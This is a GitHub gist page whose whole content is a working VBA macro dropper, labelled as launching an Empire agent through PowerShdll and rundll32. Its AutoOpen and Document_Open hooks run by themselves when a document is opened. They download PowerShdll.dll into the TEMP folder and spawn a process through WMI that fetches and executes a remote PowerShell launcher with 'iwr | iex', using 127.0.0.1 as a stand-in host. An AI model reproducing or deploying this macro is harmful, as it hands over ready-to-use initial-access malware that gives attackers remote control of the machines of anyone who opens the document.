Skip to content

Instantly share code, notes, and snippets.

@chr0n1k

chr0n1k/Empire_via_rundll-powershdll.vba

Forked from vivami/Empire_via_rundll-powershdll.vba
Created March 5, 2022 10:16
Show Gist options
  • Save chr0n1k/56a1813c9d055cee7b1486740e595da0 to your computer and use it in GitHub Desktop.
Save chr0n1k/56a1813c9d055cee7b1486740e595da0 to your computer and use it in GitHub Desktop.
Download ZIP
VBA macro executing Empire Agent using PowerShdll via rundll
Raw
Empire_via_rundll-powershdll.vba
Sub AutoOpen()
Debugging
End Sub
Sub Document_Open()
Debugging
End Sub
Public Function Debugging() As Variant
DownloadDLL
Dim Str As String
Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { iwr -useb https://127.0.0.1/Empire_default_launcher.ps1 } ^| iex;"
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function
Sub DownloadDLL()
Dim dll_Loc As String
dll_Loc = Environ("TEMP") & "\powershdll.dll"
If Not Dir(dll_Loc, vbDirectory) = vbNullString Then
Exit Sub
End If
Dim dll_URL As String
#If Win64 Then
dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
#Else
dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
#End If
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", dll_URL, False
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile dll_Loc
oStream.Close
End If
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment